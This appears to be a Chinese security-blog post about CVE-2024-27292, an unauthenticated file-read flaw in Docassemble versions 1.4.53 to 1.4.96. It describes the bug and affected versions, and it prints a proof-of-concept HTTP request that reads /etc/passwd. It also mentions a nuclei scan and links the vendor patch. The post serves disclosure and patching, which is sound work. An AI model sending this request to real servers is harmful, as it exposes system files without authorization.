CVE-2024-27292漏洞(附EXP)

admin 2024年9月25日18:29:29评论27 views字数 661阅读2分12秒阅读模式
0x01漏洞介绍
CVE-2024-27292漏洞(附EXP)

Docassemble是Jonathan Pyle个人开发者的一个免费的开源专家系统,用于指导访谈和文档组装。

Docassemble 1.4.53至1.4.96版本存在安全漏洞,该漏洞源于允许攻击者通过操作URL获得对系统信息的未授权的访问。

0x02影响版本

Docassemble Docassemble 1.4.96

Docassemble Docassemble 1.4.53

CVE-2024-27292漏洞(附EXP)

0x03漏洞复现

1.访问漏洞环境

CVE-2024-27292漏洞(附EXP)

2.对漏洞进行复现

POC 

漏洞复现

GET /interview?i=/etc/passwd HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; QQBrowser/7.0.3698.400)

文件读取成功。

CVE-2024-27292漏洞(附EXP)

3.Yakit工具加载nuclei文件测试(漏洞存在)

CVE-2024-27292漏洞(附EXP)

CVE-2024-27292漏洞(附EXP)
0x04修复建议
目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

https://github.com/jhpyle/docassemble/commit/97f77dc486a26a22ba804765bfd7058aabd600c9

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月25日18:29:29
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-27292漏洞(附EXP)http://cn-sec.com/archives/3207344.html

发表评论

匿名网友 填写信息